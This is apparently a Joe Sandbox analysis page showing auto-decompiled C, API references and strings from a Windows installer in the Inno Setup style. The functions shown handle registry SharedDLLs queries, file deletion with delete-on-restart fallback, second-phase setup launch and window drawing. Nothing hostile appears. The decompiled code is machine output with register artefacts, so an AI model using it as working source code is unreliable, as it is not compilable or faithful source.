0x00452bd3
0x00452bd6
0x00452bdf
0x00452be0
0x00452be5
0x00452be8
0x00452c06
0x00452c0f
0x00452c10
0x00452c2f
0x00452c39
0x00452c3c
0x00452c3c
0x00452c12
0x00452c12
0x00452c15
0x00452c49
0x00452c6c
0x00452c6e
0x00452c6e
0x00452c73
0x00452c73
0x00452c17
0x00452c18
0x00452c7c
0x00452c9e
0x00452ca0
0x00452ca0
0x00452c9e
0x00452c18
0x00452c15
0x00452c10
0x00452ca5
0x00452ca7
0x00452caa
0x00452cc2
0x00452cc4
0x00452cc6
0x00452cc6
0x00452cd3
0x00452cd5
0x00452cd5
0x00452cd8
0x00452cde
0x00452cdf
0x00452cf1
0x00452cff
0x00452d08
0x00452d0c
0x00452d0d
0x00452d12
0x00452d16
0x00452d17
0x00452ce1
0x00452ce7
0x00452d1e
0x00452d23
0x00452d27
0x00452d28
0x00452d2d
0x00452d31
0x00452d32
0x00452d32
0x00452ce7
0x00452d3b
0x00452d42
0x00452d45
0x00452d48
0x00452d55
0x00452d5d
0x00452d65
0x00452d72

APIs

Part of subcall function 0042DD50: 6D2B64E0.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD7C

RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,00452CAF,?,00000000,00452D73), ref: 00452BFF
RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,00452CAF,?,00000000,00452D73), ref: 00452D3B

Part of subcall function 0042E7A4: FormatMessageA.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,004500A0,00000000,004500ED,?,0044FE48,00000000,69465405), ref: 0042E7C3

Strings

Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00452B17
RegCreateKeyEx, xrefs: 00452B73
, xrefs: 00452B61
Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00452B47

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: CloseFormatMessageQueryValue
String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
API String ID: 2240843642-1280779767
Opcode ID: a555873e383ff542ace6cedc05f53156c3043bcafe857afcb8bdd9009b4f3021
Instruction ID: da9dbf77a1f24fbd3379a4794ca1cf2bf9848e63082cc5553f13bb7f79a94942
Opcode Fuzzy Hash: a555873e383ff542ace6cedc05f53156c3043bcafe857afcb8bdd9009b4f3021
Instruction Fuzzy Hash: 7E811C75900209ABDF11DFA5C941BEEB7B8EF09305F10442BE901F7282D7789A09CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0045734C Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0045734C(char __eax, void* __ebx, char __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, char _a4, char _a8, intOrPtr _a12) {
				char _v5;
				char _v6;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				void* _t52;
				void* _t96;
				void* _t111;
				intOrPtr _t129;
				intOrPtr _t141;
				void* _t149;
				signed int _t150;
				char _t152;
				void* _t154;
				void* _t155;
				intOrPtr _t156;

				_t148 = __edi;
				_t154 = _t155;
				_t156 = _t155 + 0xffffffec;
				_push(__edi);
				_v12 = 0;
				_v24 = 0;
				_v5 = __ecx;
				_t111 = __edx;
				_t152 = __eax;
				_push(_t154);
				_push(0x45758f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t156;
				_v6 = 1;
				E0042C9E8(__eax, __ecx,  &_v12, __eflags);
				_t52 = E00406B28(_v12, 0x4575ac);
				_t158 = _t52;
				if(_t52 == 0) {
					E0042C6B8(_t152, _t111,  &_v12, 0x4575bc, __edi, _t152, _t158);
					E004513FC(_t111, _v12, _t158);
					E0042C6B8(_t152, _t111,  &_v12, 0x4575cc, __edi, _t152, _t158);
					E004513FC(_t111, _v12, _t158);
				}
				if(E00451830(_t111, _t152, _t158) == 0) {
					L19:
					_pop(_t129);
					 *[fs:eax] = _t129;
					_push(E00457596);
					E00403548( &_v24);
					return E00403548( &_v12);
				} else {
					_v20 = _t152;
					_v16 = 0xb;
					_t115 = 0;
					E00455A04("Deleting file: %s", _t111, 0,  &_v20, _t148, _t152);
					_t160 = _a4;
					if(_a4 != 0) {
						_t150 = E004515D4(_t111, _t152, _t160);
						if(_t150 != 0xffffffff) {
							_t162 = _t150 & 0x00000001;
							if((_t150 & 0x00000001) != 0) {
								_t115 = _t150 & 0xfffffffe;
								_t96 = E00451918(_t111, _t150 & 0xfffffffe, _t152, _t162);
								_t163 = _t96;
								if(_t96 == 0) {
									E00455814("Failed to strip read-only attribute.", _t111, _t150, _t152);
								} else {
									E00455814("Stripped read-only attribute.", _t111, _t150, _t152);
								}
							}
						}
					}
					if(E004513FC(_t111, _t152, _t163) != 0) {
						__eflags = _v5;
						if(_v5 != 0) {
							SHChangeNotify(4, 1, E00403880(_t152), 0);
							E0042C990(_t152, _t115,  &_v12);
							E0045463C( *((intOrPtr*)(_a12 - 0x14)), _t115, _v12);
						}
						goto L19;
					}
					_t149 = GetLastError();
					if(_a8 == 0 ||  *((char*)(_a12 - 1)) == 0) {
						L16:
						_v20 = _t149;
						_v16 = 0;
						E00455A04("Failed to delete the file; it may be in use (%d).", _t111, 0,  &_v20, _t149, _t152);
						_v6 = 0;
						goto L19;
					} else {
						if(_t149 == 5) {
							L14:
							if((E004515D4(_t111, _t152, _t168) & 0x00000001) != 0) {
								goto L16;
							}
							_v20 = _t149;
							_v16 = 0;
							E00455A04("The file appears to be in use (%d). Will delete on restart.", _t111, 0,  &_v20, _t149, _t152);
							_push(_t154);
							_push(0x4574ec);
							_push( *[fs:eax]);
							 *[fs:eax] = _t156;
							E00452300(_t111, _t111, _t152, _t149, _t152);
							 *((char*)( *((intOrPtr*)(_a12 - 8)) + 0x1c)) = 1;
							E0042C8F0(_t152,  &_v24);
							E0042C990(_v24, 0,  &_v12);
							E0045463C( *((intOrPtr*)(_a12 + 0xfffffffffffffff0)), _a12, _v12);
							_pop(_t141);
							 *[fs:eax] = _t141;
							goto L19;
						}
						_t168 = _t149 - 0x20;
						if(_t149 != 0x20) {
							goto L16;
						}
						goto L14;
					}
				}
			}

0x0045734c
0x0045734d
0x0045734f
0x00457354
0x00457357
0x0045735a
0x0045735d
0x00457360
0x00457362
0x00457366
0x00457367
0x0045736c
0x0045736f
0x00457372
0x0045737b
0x00457388
0x0045738d
0x0045738f
0x0045739b
0x004573a5
0x004573b4
0x004573be
0x004573be
0x004573ce
0x00457571
0x00457573
0x00457576
0x00457579
0x00457581
0x0045758e
0x004573d4
0x004573d4
0x004573d7
0x004573de
0x004573e5
0x004573ea
0x004573ee
0x004573f9
0x004573fe
0x00457400
0x00457406
0x0045740a
0x00457411
0x00457416
0x00457418
0x0045742b
0x0045741a
0x0045741f
0x0045741f
0x00457418
0x00457406
0x004573fe
0x0045743b
0x00457540
0x00457544
0x00457554
0x0045755e
0x0045756c
0x0045756c
0x00000000
0x00457544
0x00457446
0x0045744c
0x00457524
0x00457524
0x00457527
0x00457535
0x0045753a
0x00000000
0x0045745f
0x00457462
0x0045746d
0x00457478
0x00000000
0x00000000
0x0045747e
0x00457481
0x0045748f
0x00457496
0x00457497
0x0045749c
0x0045749f
0x004574a8
0x004574b3
0x004574bc
0x004574c7
0x004574da
0x004574e1
0x004574e4
0x00000000
0x004574e4
0x00457464
0x00457467
0x00000000
0x00000000
0x00000000
0x00457467
0x0045744c

APIs

GetLastError.KERNEL32(00000000,0045758F,?,?,?,?), ref: 00457441

Part of subcall function 004513FC: 6D2B5F60.KERNEL32(00000000,00000000,00451459,?,-00000001,?), ref: 00451433
Part of subcall function 004513FC: GetLastError.KERNEL32(00000000,00000000,00451459,?,-00000001,?), ref: 0045143B

Part of subcall function 00455814: GetLocalTime.KERNEL32(?,00000000,0045599B,?,?,0048DF10,00000000), ref: 00455844

Strings

Deleting file: %s, xrefs: 004573E0
The file appears to be in use (%d). Will delete on restart., xrefs: 0045748A
Failed to delete the file; it may be in use (%d)., xrefs: 00457530
Failed to strip read-only attribute., xrefs: 00457426
.HLP, xrefs: 00457383
.GID, xrefs: 00457394
.FTS, xrefs: 004573AD
Stripped read-only attribute., xrefs: 0045741A

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: ErrorLast$LocalTime
String ID: .FTS$.GID$.HLP$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
API String ID: 3586426482-88052198
Opcode ID: e9d1e1163e8f0ddbb37acde3e0e680194e15c915ee13dbea2003a49085ba12f1
Instruction ID: 3227a4a011d5f66b2205ba73319beb8172ea49436f3625b92c0adb952f7f1a27
Opcode Fuzzy Hash: e9d1e1163e8f0ddbb37acde3e0e680194e15c915ee13dbea2003a49085ba12f1
Instruction Fuzzy Hash: C451D230B082486BCB01EB6998817AE7BA59F49315F50847BFC0197393D77C8E4DCB99

Uniqueness

Uniqueness Score: -1.00%

Function 004894F8 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E004894F8(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				struct HWND__* _v12;
				void* _v16;
				char _v20;
				char _v24;
				struct HWND__* _v28;
				char _v32;
				char _v36;
				char _v40;
				intOrPtr _t39;
				void* _t40;
				struct HINSTANCE__* _t43;
				intOrPtr _t48;
				void* _t61;
				struct HWND__* _t69;
				intOrPtr _t73;
				intOrPtr _t92;
				intOrPtr _t94;
				void* _t98;
				void* _t99;
				intOrPtr _t100;

				_t96 = __esi;
				_t95 = __edi;
				_t80 = __ecx;
				_t79 = __ebx;
				_t98 = _t99;
				_t100 = _t99 + 0xffffffdc;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v20 = 0;
				_v40 = 0;
				_v8 = 0;
				_push(_t98);
				_push(0x4896c9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t100;
				E0042D990( &_v20, __ebx, __ecx, __edi, __esi);
				if(E00451FB0(_v20, _t79,  &_v8, _t95, _t96) == 0) {
					_push(_t98);
					_push( *[fs:eax]);
					 *[fs:eax] = _t100;
					E00452300(0, _t79, _v8, _t95, _t96);
					_pop(_t94);
					_t80 = 0x489555;
					 *[fs:eax] = _t94;
				}
				_push(0);
				_push(E00403880(_v8));
				_t39 =  *0x4ae328; // 0x0
				_t40 = E00403880(_t39);
				_push(_t40);
				L00405954();
				_t103 = _t40;
				if(_t40 == 0) {
					_t73 =  *0x48dcf4; // 0x21ea674
					E00488D70(_t73, _t79, _t80, _t95, _t96, _t103);
				}
				_push(0x80);
				_push(E00403880(_v8));
				L00405BE4();
				_t43 =  *0x48d014; // 0x400000
				_v12 = CreateWindowExA(0, "STATIC", 0x4896d8, 0, 0, 0, 0, 0, 0, 0, _t43, 0);
				 *0x4ae350 = SetWindowLongA(_v12, 0xfffffffc, E00488F20);
				_push(_t98);
				_push(0x48969c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t100;
				_t48 =  *0x48d628; // 0x21d2410
				SetWindowPos( *(_t48 + 0x20), 0, 0, 0, 0, 0, 0x97);
				E0042D468(0, _t79,  &_v40, _t95, _t96);
				_v36 = _v40;
				_v32 = 0xb;
				_v28 = _v12;
				_v24 = 0;
				E00407B08("/SECONDPHASE=\"%s\" /FIRSTPHASEWND=$%x ", 1,  &_v36,  &_v20);
				_push( &_v20);
				E0042D2D8( &_v40);
				_pop(_t61);
				E004036C4(_t61, _v40);
				_v16 = E00488E18(_v8, _t79, _v20, _t95, _t96, 0);
				do {
				} while (E00488EE4() == 0 && MsgWaitForMultipleObjects(1,  &_v16, 0, 0xffffffff, 0xff) == 1);
				CloseHandle(_v16);
				_pop(_t92);
				 *[fs:eax] = _t92;
				_push(E004896A3);
				_t69 = _v12;
				_push(_t69);
				L00405F6C();
				return _t69;
			}

0x004894f8
0x004894f8
0x004894f8
0x004894f8
0x004894f9
0x004894fb
0x004894fe
0x004894ff
0x00489500
0x00489503
0x00489506
0x00489509
0x0048950e
0x0048950f
0x00489514
0x00489517
0x0048951d
0x0048952f
0x00489533
0x00489539
0x0048953c
0x00489546
0x0048954d
0x0048954f
0x00489550
0x00489550
0x0048955f
0x00489569
0x0048956a
0x0048956f
0x00489574
0x00489575
0x0048957a
0x0048957c
0x0048957e
0x00489583
0x00489583
0x00489588
0x00489595
0x00489596
0x0048959d
0x004895c2
0x004895d5
0x004895dc
0x004895dd
0x004895e2
0x004895e5
0x004895f7
0x00489600
0x0048960e
0x00489616
0x00489619
0x00489620
0x00489623
0x00489634
0x0048963c
0x00489640
0x00489648
0x00489649
0x00489659
0x0048965c
0x00489661
0x00489680
0x00489687
0x0048968a
0x0048968d
0x00489692
0x00489695
0x00489696
0x0048969b

APIs

Part of subcall function 00451FB0: 6D2B5CA0.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004896C9,_iu,?,00000000,004520EA), ref: 0045209F
Part of subcall function 00451FB0: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004896C9,_iu,?,00000000,004520EA), ref: 004520AF

6D2B5AA0.KERNEL32(00000000,00000000,00000000,00000000,004896C9), ref: 00489575
6D2B69D0.KERNEL32(00000000,00000080,00000000,00000000,00000000,00000000,004896C9), ref: 00489596
CreateWindowExA.USER32 ref: 004895BD
SetWindowLongA.USER32 ref: 004895D0
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,0048969C,?,?,000000FC,00488F20,00000000,STATIC,004896D8), ref: 00489600
MsgWaitForMultipleObjects.USER32 ref: 00489674
CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,0048969C,?,?,000000FC,00488F20,00000000), ref: 00489680

Part of subcall function 00452300: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004523E7

740C9840.USER32(?,004896A3,00000000,00000000,00000000,00000000,00000000,00000097,00000000,0048969C,?,?,000000FC,00488F20,00000000,STATIC), ref: 00489696

Strings

STATIC, xrefs: 004895B6
/SECONDPHASE="%s" /FIRSTPHASEWND=$%x , xrefs: 0048962F

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Window$CloseHandle$C9840CreateLongMultipleObjectsPrivateProfileStringWaitWrite
String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
API String ID: 257583649-2312673372
Opcode ID: 6aed06ba62e7db57bb8660334e9152d14775fe0275a879ff382b347e4b9f41bf
Instruction ID: f473d16e4bf1fef2551971249c877a9172a21eca7571e0471697ef7334523eec
Opcode Fuzzy Hash: 6aed06ba62e7db57bb8660334e9152d14775fe0275a879ff382b347e4b9f41bf
Instruction Fuzzy Hash: 2F413071A04604AFDB01FBA5CC52BAE77F8EB09714F50096AF510F72D1D779AE008B68

Uniqueness

Uniqueness Score: -1.00%

Function 0042EA70 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82COMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 0042EA7C
GetModuleHandleA.KERNEL32(user32.dll), ref: 0042EA90
6D2B5550.KERNEL32(00000000,MonitorFromWindow,user32.dll), ref: 0042EA9D
6D2B5550.KERNEL32(00000000,GetMonitorInfoA,00000000,MonitorFromWindow,user32.dll), ref: 0042EAAA
GetWindowRect.USER32 ref: 0042EAF6
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 0042EB34

Strings

MonitorFromWindow, xrefs: 0042EA97
GetMonitorInfoA, xrefs: 0042EAA4
user32.dll, xrefs: 0042EA8B
(, xrefs: 0042EAD5

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Window$B5550$ActiveHandleModuleRect
String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
API String ID: 3330703269-3407710046
Opcode ID: 2cd2107e4866441c595d6730d51f86a74f5d9b62cd5ee3981dd78023a54cefad
Instruction ID: 768ed85cd67202e5741d283b9a3b63fc6ba3d975ab7abdf05bd0f1df392ec8c4
Opcode Fuzzy Hash: 2cd2107e4866441c595d6730d51f86a74f5d9b62cd5ee3981dd78023a54cefad
Instruction Fuzzy Hash: B221C2717016246BD610EA69DCD2F3B7BD8EB88710F48062DF945EB3C5EA78EC018B59

Uniqueness

Uniqueness Score: -1.00%

Function 0044D2F0 Relevance: 17.0, APIs: 11, Instructions: 477
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0044D2F0(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, signed int _a4) {
				void* _v8;
				intOrPtr _v12;
				signed int _v13;
				int _v20;
				int _v24;
				signed int _v28;
				int _v32;
				signed int _v36;
				long _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				int _v60;
				char _v64;
				int _v68;
				void _v72;
				struct tagRECT _v88;
				intOrPtr _v96;
				void _v104;
				struct tagRECT _v120;
				char _v124;
				void* _t256;
				signed int _t263;
				void* _t266;
				signed int _t278;
				int _t279;
				long _t327;
				long _t332;
				intOrPtr _t337;
				int _t339;
				void* _t350;
				void* _t352;
				void* _t406;
				signed int _t411;
				signed int _t412;
				int _t414;
				signed int _t431;
				intOrPtr _t452;
				int _t453;
				signed int _t455;
				signed int _t480;
				signed int _t481;
				intOrPtr _t482;
				intOrPtr _t489;
				signed int _t502;
				signed int _t503;
				intOrPtr _t504;
				signed int _t511;
				int _t514;
				void* _t522;
				long _t531;
				void* _t536;
				intOrPtr _t538;
				void* _t550;
				char _t554;
				void* _t560;

				_t482 = __edx;
				_t535 = _t536;
				_push(__edi);
				_v124 = 0;
				_t256 = memcpy( &_v72, __ecx, 4 << 2);
				_t538 = _t536 + 0xffffffffffffff94;
				_t458 = 0;
				_v12 = _t482;
				_v8 = _t256;
				_push(_t536);
				_push(0x44d8f0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t538;
				if( *((char*)(_v8 + 0x164)) != 0 &&  *((char*)(_v8 + 0x174)) == 0) {
					E0044E958(_v8);
					 *((char*)(_v8 + 0x174)) = 1;
				}
				_t522 = E0044DDD8(_v8);
				if( *0x48d744 == 0) {
					__eflags = 0;
					_v44 = 0;
				} else {
					_v44 = SendMessageA(E004183F8(_v8), 0x129, 0, 0);
				}
				if( *((char*)(_v8 + 0x38)) == 0 ||  *((char*)(_t522 + 4)) == 0) {
					_t263 = 1;
				} else {
					_t263 = 0;
				}
				_v13 = _t263;
				_t531 =  *(_v8 + 0x104);
				if( *(_v8 + 0x16c) != 0) {
					_t546 = _a4 & 0x00000001;
					if((_a4 & 0x00000001) != 0) {
						E0041A8C4( *((intOrPtr*)(_t531 + 0x14)),  *((intOrPtr*)(_v8 + 0x48)), _t546);
					}
				}
				_t266 = _v8;
				_t547 =  *((char*)(_t266 + 0x164));
				if( *((char*)(_t266 + 0x164)) == 0) {
					L31:
					if( *((char*)(_t522 + 8)) == 0) {
						L62:
						E0041AE78(_t531, _t458,  &_v72, _t522);
						_v72 = _v72 + 1;
						_v40 = GetTextColor(E0041B2AC(_t531));
						if(_v13 == 0) {
							__eflags =  *(_v8 + 0x16c);
							if(__eflags != 0) {
								_t327 = E0041A270( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x44)) + 0x10)));
								SetTextColor(E0041B2AC(_t531), _t327);
							}
						} else {
							if( *(_v8 + 0x16c) == 0 && (_a4 & 0x00000001) == 0) {
								_t332 = GetSysColor(0x11);
								SetTextColor(E0041B2AC(_t531), _t332);
							}
						}
						_t573 =  *((intOrPtr*)(_t522 + 0x14));
						if( *((intOrPtr*)(_t522 + 0x14)) == 0) {
							_t199 =  &_v64;
							 *_t199 = _v64 -  *((intOrPtr*)(_v8 + 0x158));
							__eflags =  *_t199;
						} else {
							_v48 = E0041B144(_t531, _t458,  *((intOrPtr*)(_t522 + 0x14)), _t522, _t573) +  *((intOrPtr*)(_v8 + 0x158)) +  *((intOrPtr*)(_v8 + 0x158));
							memcpy( &_v104,  &_v72, 4 << 2);
							_t538 = _t538 + 0xc;
							_t522 = _t522;
							_t531 = _t531;
							_v104 = _v96 - _v48 +  *((intOrPtr*)(_v8 + 0x158));
							E0044D1EC( *((intOrPtr*)(_t522 + 0x14)), 0x924,  &_v104,  *(_v8 + 0x16c) & _v13, _t535);
							_v64 = _v64 - _v48;
						}
						if( *(_v8 + 0x16c) == 0) {
							_v72 = _v72 + 1;
						}
						_t278 = _v60 - _v68 -  *((intOrPtr*)(_t522 + 0x38));
						_t279 = _t278 >> 1;
						if(_t278 < 0) {
							asm("adc eax, 0x0");
						}
						OffsetRect( &_v72, 0, _t279);
						_v36 = 0x40110;
						if( *(_v8 + 0x16c) == 0 ||  *((char*)(_t522 + 8)) == 0) {
							_v36 = _v36 | 0x00000800;
						}
						if((_v44 & 0x00000002) != 0) {
							_v36 = _v36 | 0x00100000;
						}
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xfc)))) + 0xc))();
						E0044D1EC(_v124, _v36 | 0x00000400,  &_v72, 0, _t535);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xfc)))) + 0xc))();
						E0044D1EC(_v124, _v36,  &_v72,  *(_v8 + 0x16c) & _v13, _t535);
						if( *(_v8 + 0x16c) != 0 && _v13 == 0 && (_a4 & 0x00000001) != 0 && E004183B0(_v8) != 0 && (_v44 & 0x00000001) == 0) {
							memcpy( &_v120,  &_v72, 4 << 2);
							_t531 = _t531;
							InflateRect( &_v120, 1, 1);
							E0041ADFC(_t531,  &_v120);
						}
						SetTextColor(E0041B2AC(_t531), _v40);
						_pop(_t489);
						 *[fs:eax] = _t489;
						_push(0x44d8f7);
						return E00403548( &_v124);
					}
					_t337 =  *((intOrPtr*)(_v8 + 0x158));
					_v72 = _v72 -  *(_v8 + 0x148) + _t337 + _t337;
					_v88.left = _t337 + _v72;
					_t339 = _v68;
					_t458 = _v8;
					_t502 = _v60 - _t339 -  *((intOrPtr*)(_v8 + 0x144));
					_t503 = _t502 >> 1;
					if(_t502 < 0) {
						asm("adc edx, 0x0");
					}
					_t504 = _t503 + _t339;
					_v88.top = _t504;
					_v88.bottom =  *((intOrPtr*)(_v8 + 0x144)) + _t504;
					_v88.right =  *(_v8 + 0x148) + _v88.left;
					if( *((intOrPtr*)(_v8 + 0x170)) != 0) {
						_v52 =  *0x0048C978;
						__eflags = _v13;
						if(__eflags == 0) {
							_t350 = _v8;
							__eflags =  *((intOrPtr*)(_t350 + 0x13c)) - _v12;
							if( *((intOrPtr*)(_t350 + 0x13c)) != _v12) {
								_t352 = _v8;
								__eflags =  *((intOrPtr*)(_t352 + 0x13c));
								if( *((intOrPtr*)(_t352 + 0x13c)) >= 0) {
									L59:
									__eflags = 0;
									_t452 =  *0x0048C984;
									L60:
									 *0x48d688( *((intOrPtr*)(_v8 + 0x170)), E0041B2AC(_t531), _v52, _t452,  &_v88,  &_v88);
									goto L61;
								}
								__eflags =  *((intOrPtr*)(_v8 + 0x178)) - _v12;
								if(__eflags != 0) {
									goto L59;
								}
								_t452 =  *0x0048C988;
								goto L60;
							}
							__eflags =  *((char*)(_v8 + 0x140));
							if(__eflags != 0) {
								L54:
								_t452 =  *0x0048C98C;
								goto L60;
							}
							__eflags =  *((intOrPtr*)(_v8 + 0x150)) - _v12;
							if(__eflags != 0) {
								_t452 =  *((intOrPtr*)(0x48c988));
								goto L60;
							}
							goto L54;
						}
						_t452 =  *0x0048C990;
						goto L60;
					} else {
						_t560 =  *((intOrPtr*)(_t522 + 0x10)) - 1;
						if(_t560 < 0) {
							_t453 =  *0x0048C96C;
						} else {
							if(_t560 != 0) {
								_t453 = 0x408;
							} else {
								_t453 =  *0x0048C96C | 0x00000400;
							}
						}
						if( *((char*)(_v8 + 0x14d)) != 0) {
							_t453 = _t453 | 0x00004000;
						}
						if(_v13 != 0) {
							_t453 = _t453 | 0x00000100;
						}
						if( *((intOrPtr*)(_v8 + 0x13c)) == _v12 && ( *((char*)(_v8 + 0x140)) != 0 ||  *((intOrPtr*)(_v8 + 0x150)) == _v12)) {
							_t453 = _t453 | 0x00000200;
						}
						DrawFrameControl(E0041B2AC(_t531),  &_v88, 4, _t453);
						L61:
						_v72 =  *((intOrPtr*)(_v8 + 0x158)) + _v88.right;
						goto L62;
					}
				}
				E0041A718( *((intOrPtr*)(_t531 + 0x10)), 0x80000011, _t547);
				_v28 = E0044DDE4(_v8, _v12) & 0x000000ff;
				_t406 = _v28 - 1;
				if(_t406 >= 0) {
					_v56 = _t406 + 1;
					_t455 = 0;
					do {
						E0044DDD8(_v8);
						_t550 = _t455 - 0xff;
						if(_t550 <= 0) {
							asm("bt [eax+0x18], edx");
						}
						if(_t550 < 0) {
							_t411 =  *(_v8 + 0x148);
							_t511 = (_t411 +  *((intOrPtr*)(_v8 + 0x158)) +  *((intOrPtr*)(_v8 + 0x158))) * _t455;
							_t412 = _t411 >> 1;
							if(_t511 < 0) {
								asm("adc eax, 0x0");
							}
							_v20 = _t511 + _t412 +  *((intOrPtr*)(_v8 + 0x158));
							_t514 = _v60;
							_t414 = _v68;
							_t480 = _t514 - _t414;
							_t481 = _t480 >> 1;
							if(_t480 < 0) {
								asm("adc ecx, 0x0");
							}
							_t458 = _t481 + _t414;
							_v32 = _t481 + _t414;
							_v24 = _t514;
							if(_t455 == _v28 - 1) {
								_t554 =  *((char*)(E0044DDD8(_v8) + 7));
								if(_t554 != 0) {
									_v24 = _v32;
								}
								_push( *(_v8 + 0x104));
								_push(E0044CC0C);
								_push(_v32);
								_t431 =  *(_v8 + 0x148) >> 1;
								if(_t554 < 0) {
									asm("adc eax, 0x0");
								}
								LineDDA(_v20, _v32, _t431 + _v20 +  *((intOrPtr*)(_v8 + 0x158)), ??, ??, ??);
							}
							LineDDA(_v20, _v68, _v20, _v24, E0044CC0C,  *(_v8 + 0x104));
						}
						_t455 = _t455 + 1;
						_t75 =  &_v56;
						 *_t75 = _v56 - 1;
					} while ( *_t75 != 0);
				}
			}

0x0044d2f0
0x0044d2f1
0x0044d2f8
0x0044d2fb
0x0044d308
0x0044d308
0x0044d308
0x0044d30a
0x0044d30d
0x0044d312
0x0044d313
0x0044d318
0x0044d31b
0x0044d328
0x0044d339
0x0044d341
0x0044d341
0x0044d353
0x0044d35c
0x0044d37a
0x0044d37c
0x0044d35e
0x0044d375
0x0044d375
0x0044d386
0x0044d392
0x0044d38e
0x0044d38e
0x0044d38e
0x0044d394
0x0044d39a
0x0044d3aa
0x0044d3ac
0x0044d3b0
0x0044d3bb
0x0044d3bb
0x0044d3b0
0x0044d3c0
0x0044d3c3
0x0044d3ca
0x0044d4f4
0x0044d4f8
0x0044d6da
0x0044d6df
0x0044d6e4
0x0044d6f4
0x0044d6fb
0x0044d729
0x0044d730
0x0044d73b
0x0044d749
0x0044d749
0x0044d6fd
0x0044d707
0x0044d711
0x0044d71f
0x0044d71f
0x0044d707
0x0044d74e
0x0044d752
0x0044d7c1
0x0044d7c1
0x0044d7c1
0x0044d754
0x0044d76b
0x0044d77b
0x0044d77b
0x0044d77d
0x0044d77e
0x0044d78e
0x0044d7aa
0x0044d7b3
0x0044d7b3
0x0044d7ce
